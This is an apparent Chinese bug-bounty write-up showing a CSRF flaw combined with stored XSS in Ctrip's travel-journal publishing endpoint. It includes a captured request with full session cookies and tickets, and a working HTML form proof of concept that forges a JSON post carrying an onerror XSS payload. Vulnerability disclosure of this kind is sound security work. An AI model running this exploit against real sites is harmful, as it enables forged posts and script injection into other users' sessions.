携程发游记处存在Csrf+存储Xss漏洞

声明：内部文章,禁止转载!

继上篇 携程某处存在Json格式的Csrf漏洞发游记 写完后，又挖到一个 Xss (某大佬提醒的),然后造成了组合拳~

URL -> http://you.ctrip.com/members/47A3D55C158041BD8D7F21A7BA084AA1/journals

打开URL后，页面如图

点击上图的写游记

点击后会进入另一个页面，如下图

点击发布

又又又还有一个页面

选好后点击提交并且抓包

抓取的数据包如下：

POST /TravelSite/Member/SaveNewTravel HTTP/1.1
Host: you.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://you.ctrip.com/TravelSite/Member/EditNewTravel?travelId=3689502
Content-Length: 508
Cookie: _bfa=1.1529559162771.3aowri.1.1529564159709.1529575803710.3.139; adscityen=Meizhou; _RF1=120.239.228.99; _RSG=T6KJObxFMeEUqcn7NtwLW8; _RDG=2885568a6cac882bb818690bc2de21a339; _RGUID=ea163fb9-584d-419d-8815-eb75c7c66d1e; _jzqco=%7C%7C%7C%7C1529559191059%7C1.113394883.1529559190871.1529579192824.1529579227556.1529579192824.1529579227556.undefined.0.0.31.31; __zpspc=9.3.1529576375.1529579227.12%234%7C%7C%7C%7C%7C%23; MKT_Pagesource=PC; _bfi=p1%3D290606%26p2%3D290606%26v1%3D139%26v2%3D137; login_uid=92A18FCF669DF32698BF54DD2CE7E1D1; login_type=0; UUID=1508E76B015E4E609698BCA0B9CA2320; IsPersonalizedLogin=T; appFloatCnt=1; manualclose=1; ASP.NET_SessionSvc=MTAuOC4xODkuNjB8OTA5MHxqaW5xaWFvfGRlZmF1bHR8MTUyNjUzNzExNDI2Mw; bdshare_firstime=1529559824392; _abtest_userid=a62eb7c0-4054-48fa-8421-eaae213957d6; ASP.NET_SessionId=tcktpejhlxfokmlnf1q1zn3j; _bfs=1.41; cticket=1C81168DBA3550FFB18DE9387721086ADC29F177C61F3FCDDEC332A0F561FEA1; ticket_ctrip=bJ9RlCHVwlu1ZjyusRi+ypZ7X2r4+yojO82DkiXyGYeP0Mg96gJEQ+LWMo18plOrPdkAeXYih6tqb1Y94QwsvBuemHYmTAK0dmQ8i4jhcqKgOgeTp2vPOL0poU5JHB7aZMn8dLj1VWnc06YYBrgW94hk8E69pgP+7xG9aEMLIjSajqQw9nQHaiqeULn6n6AWdH6Nx5wwmPYV+vaMlu4TmQRy40no+qH6nW0v79DvqWom85pWMuKY4cNlH+KZ0DFagL1nXMWbTg4m8Yq5UtJ0aAvGpE4MsXq6PXfRNy1Vkmc=; AHeadUserInfo=VipGrade=0&UserName=&NoReadMessageCount=0; DUID=u=08F36DBB6DC5886589DDBB5100AD9461&v=0; IsNonUser=F
Connection: close

{"Content":"<p>1111111111&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/></p>","Title":"11111","UploadPicContent":"","CoverImageId":0,"TravelId":"3689502","CoverLocationY":0,"ClassifiedInfo":{"DistrictList":[{"DistrictId":"110000","DistrictName":"中国，亚洲","IsSelected":true},{"DistrictId":"1","DistrictName":"111111>","IsSelected":true}],"TagList":[],"TravelId":"3689502","ClassifiedType":6,"TravelDays":1111111111,"DepartureDate":"2018-06-13","Consume":111,"CompanionType":1},"PublishStatus":1}

可以看到这里是由 Json 传递的，并且没有 Token 之类的验证，那么就可能会存在 Csrf

我们将其构造成 Csrf Poc,这里还存在存储Xss，打包在如下POC:

<html>
  <body>
  <script>history.pushState('', '', '/');</script>
    <form action="http://you.ctrip.com/TravelSite/Member/SaveNewTravel" method="POST" enctype="text/plain">
      <input name='{"Content":"<h1>test</h1><img src=x onerror=alert(\"cookie\")>","UploadPicContent":"","CoverImageId":0,"TravelId":"3689502","CoverLocationY":0,"ClassifiedInfo":{"DistrictList":[{"DistrictId":"110000","DistrictName":"涓浗锛屼簹娲�","IsSelected":true},{"DistrictId":"1","DistrictName":"111111>","IsSelected":true}],"TagList":[],"TravelId":"3689502","ClassifiedType":6,"TravelDays":1111111111,"DepartureDate":"2018-06-13","Consume":111,"CompanionType":10},"PublishStatus":1,"Title":"love you' value='love rice"}' type='hidden'>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

在浏览器打开此Poc

查看一下是否真的发布成功~

接着我们点击编辑，查看是否会触发Xss

ok~

十年寒窗无人问，一举成名天下知
– Cai_Team